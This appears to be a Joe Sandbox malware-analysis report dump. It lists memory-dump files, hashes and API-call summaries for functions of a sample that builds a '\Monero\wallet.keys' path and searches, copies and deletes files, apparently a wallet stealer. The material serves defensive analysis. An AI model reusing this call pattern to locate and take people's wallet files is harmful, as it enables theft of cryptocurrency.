Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: 482372a6ad93af95fa17bd2cc815965c65d9493e29566517de74bf30bb1a1b84
Instruction ID: 4b3d5e44da0163f52716d4b62d16e7b0620269588f4dd365705b544965e3036d
Opcode Fuzzy Hash: 482372a6ad93af95fa17bd2cc815965c65d9493e29566517de74bf30bb1a1b84
Instruction Fuzzy Hash: 87F096B1944218EBDB10CF85EC45FAAF7BDF744714F00066AF91592680D77559448BD1

Function 0004B4F0 Relevance: 2.9, APIs: 2, Instructions: 397stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0005A740: lstrcpy.KERNEL32(00060E17,00000000), ref: 0005A788

Part of subcall function 0005A9B0: lstrlen.KERNEL32(?,00CE8690,?,\Monero\wallet.keys,00060E17), ref: 0005A9C5
Part of subcall function 0005A9B0: lstrcpy.KERNEL32(00000000), ref: 0005AA04
Part of subcall function 0005A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0005AA12

Part of subcall function 0005A920: lstrcpy.KERNEL32(00000000,?), ref: 0005A972
Part of subcall function 0005A920: lstrcat.KERNEL32(00000000), ref: 0005A982

Part of subcall function 0005A8A0: lstrcpy.KERNEL32(?,00060E17), ref: 0005A905

Part of subcall function 0005A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0005A7E6

lstrlen.KERNEL32(00000000), ref: 0004B9C2
lstrlen.KERNEL32(00000000), ref: 0004B9D6

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 27f2f33b7db91c3133857e034c61f5965d1d3d1330223e223992a89afa49096e
Instruction ID: dc35c7d81347535198fd544dd70cd7ebc2a7d3f2659a5e950ae4c4f01db34786
Opcode Fuzzy Hash: 27f2f33b7db91c3133857e034c61f5965d1d3d1330223e223992a89afa49096e
Instruction Fuzzy Hash: 2FE1DD72A101189BDF15EBA0DC96EEF7338BF55301F404269F90766092EF346A4DCBA2

Function 0004AEF0 Relevance: 2.7, APIs: 2, Instructions: 236stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0005A740: lstrcpy.KERNEL32(00060E17,00000000), ref: 0005A788

Part of subcall function 0005A9B0: lstrlen.KERNEL32(?,00CE8690,?,\Monero\wallet.keys,00060E17), ref: 0005A9C5
Part of subcall function 0005A9B0: lstrcpy.KERNEL32(00000000), ref: 0005AA04
Part of subcall function 0005A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0005AA12

Part of subcall function 0005A920: lstrcpy.KERNEL32(00000000,?), ref: 0005A972
Part of subcall function 0005A920: lstrcat.KERNEL32(00000000), ref: 0005A982

Part of subcall function 0005A8A0: lstrcpy.KERNEL32(?,00060E17), ref: 0005A905

lstrlen.KERNEL32(00000000), ref: 0004B16A
lstrlen.KERNEL32(00000000), ref: 0004B17E

Part of subcall function 0005A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0005A7E6

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 9d13bdb42fc590e7a36d687ce0a68b40a04b2b0404743a3f2d9bb785ac240ecb
Instruction ID: e070fb996496717949ca7561fc5e2d30403a565603b0aeb121ef8c886e1b53a2
Opcode Fuzzy Hash: 9d13bdb42fc590e7a36d687ce0a68b40a04b2b0404743a3f2d9bb785ac240ecb
Instruction Fuzzy Hash: BB91EF72A101189BDF04EBA0DC96DEF7379BF55301F404269F907A6192EF346A4DCBA2

Function 0004B230 Relevance: 2.7, APIs: 2, Instructions: 205stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0005A740: lstrcpy.KERNEL32(00060E17,00000000), ref: 0005A788

Part of subcall function 0005A9B0: lstrlen.KERNEL32(?,00CE8690,?,\Monero\wallet.keys,00060E17), ref: 0005A9C5
Part of subcall function 0005A9B0: lstrcpy.KERNEL32(00000000), ref: 0005AA04
Part of subcall function 0005A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0005AA12

Part of subcall function 0005A920: lstrcpy.KERNEL32(00000000,?), ref: 0005A972
Part of subcall function 0005A920: lstrcat.KERNEL32(00000000), ref: 0005A982

Part of subcall function 0005A8A0: lstrcpy.KERNEL32(?,00060E17), ref: 0005A905

lstrlen.KERNEL32(00000000), ref: 0004B42E
lstrlen.KERNEL32(00000000), ref: 0004B442

Part of subcall function 0005A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0005A7E6

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 225d030e2848392c48fe2b4a426f5dd4dfce8216946650981dbf488213720e68
Instruction ID: 130d727dadcf7eba348b64b984cceff263e7f9b15cbcb7b7ab6fe865737a447d
Opcode Fuzzy Hash: 225d030e2848392c48fe2b4a426f5dd4dfce8216946650981dbf488213720e68
Instruction Fuzzy Hash: 2D710D71A101189BDF04EBA0DC9ADFF7379BF55301F404629F906A6192EF346A0DCBA2

Function 00054BB0 Relevance: 2.6, APIs: 2, Instructions: 118stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00058DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00058E0B

lstrcat.KERNEL32(?,00000000), ref: 00054BEA
lstrcat.KERNEL32(?,00CED5D0), ref: 00054C08

Part of subcall function 00054910: wsprintfA.USER32 ref: 0005492C
Part of subcall function 00054910: FindFirstFileA.KERNEL32(?,?), ref: 00054943

Part of subcall function 00054910: StrCmpCA.SHLWAPI(?,00060FDC), ref: 00054971
Part of subcall function 00054910: StrCmpCA.SHLWAPI(?,00060FE0), ref: 00054987
Part of subcall function 00054910: FindNextFileA.KERNEL32(000000FF,?), ref: 00054B7D
Part of subcall function 00054910: FindClose.KERNEL32(000000FF), ref: 00054B92

Part of subcall function 00054910: wsprintfA.USER32 ref: 000549B0
Part of subcall function 00054910: StrCmpCA.SHLWAPI(?,000608D2), ref: 000549C5
Part of subcall function 00054910: wsprintfA.USER32 ref: 000549E2
Part of subcall function 00054910: PathMatchSpecA.SHLWAPI(?,?), ref: 00054A1E
Part of subcall function 00054910: lstrcat.KERNEL32(?,00CEF1E8), ref: 00054A4A
Part of subcall function 00054910: lstrcat.KERNEL32(?,00060FF8), ref: 00054A5C
Part of subcall function 00054910: lstrcat.KERNEL32(?,?), ref: 00054A70
Part of subcall function 00054910: lstrcat.KERNEL32(?,00060FFC), ref: 00054A82
Part of subcall function 00054910: lstrcat.KERNEL32(?,?), ref: 00054A96
Part of subcall function 00054910: CopyFileA.KERNEL32(?,?,00000001), ref: 00054AAC
Part of subcall function 00054910: DeleteFileA.KERNEL32(?), ref: 00054B31

Part of subcall function 00054910: wsprintfA.USER32 ref: 00054A07

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID:
API String ID: 2104210347-0
Opcode ID: 683491f25f2341927b635ab1a689c2c256afd60d56e8bf14bcc7df82e973719b
Instruction ID: 7a596799daea56d15b5b15ff9566993908d89ab156c7f589f203b361982a2040
Opcode Fuzzy Hash: 683491f25f2341927b635ab1a689c2c256afd60d56e8bf14bcc7df82e973719b
Instruction Fuzzy Hash: 554174BA900204ABD754FBA0FC46EEF333DA799700F008559BA4957186ED755BCC8BA2

Function 00046660 Relevance: 2.6, APIs: 2, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 00046706
VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00046753

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 666886c62f6b63da49c3b4fbdd2887b30d5e54279b300b57b91650cd7394ff58
Instruction ID: cc330615ae779b33c5c70a9121850a43122698ee249871205a0bcc9b27b40032
Opcode Fuzzy Hash: 666886c62f6b63da49c3b4fbdd2887b30d5e54279b300b57b91650cd7394ff58
Instruction Fuzzy Hash: CD41CC74A00209EFCB54CF58C494BADBBB1FF44314F2482A9E9599B355D732EA81CF85

Function 00055050 Relevance: 2.5, APIs: 2, Instructions: 48stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00058DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00058E0B

lstrcat.KERNEL32(?,00000000), ref: 0005508A
lstrcat.KERNEL32(?,00CEE8A8), ref: 000550A8

Part of subcall function 00054910: wsprintfA.USER32 ref: 0005492C
Part of subcall function 00054910: FindFirstFileA.KERNEL32(?,?), ref: 00054943

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileFindFirstFolderPathwsprintf
String ID:
API String ID: 2699682494-0
Opcode ID: 0efe890819e6f0a103421e41e8f931daf0aa6cdb7d8fd510dc2d5ea129e6ecff
Instruction ID: 36f364b1f49161cac5f0e0ef16f028f20ee5796225ebe5f5bc1c753a9df7b0f3
Opcode Fuzzy Hash: 0efe890819e6f0a103421e41e8f931daf0aa6cdb7d8fd510dc2d5ea129e6ecff
Instruction Fuzzy Hash: DE019BBA900208A7D754FB70EC47DEF737CAB54701F004559BA4956192EE749ACC8BA2

Function 000410A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 000410B3
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 000410F7

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
